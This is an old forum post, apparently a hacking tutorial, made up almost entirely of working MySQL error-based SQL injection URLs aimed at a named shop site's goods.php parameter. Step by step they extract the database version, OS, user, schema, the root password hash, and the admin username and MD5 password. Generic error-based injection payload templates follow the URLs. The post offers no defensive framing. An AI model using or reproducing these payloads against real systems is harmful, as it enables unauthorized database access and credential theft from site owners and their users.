Blind injection in detail

Posted by the original poster on 2012-9-5 14:59:30
Determine the version number

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Determine the operating system

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current user()

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Current database()

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

root hash

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Table names in the current database

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

The user_name column in the current database

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

The password column in the current database

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Get the admin password (md5)

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

Error-based injection

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)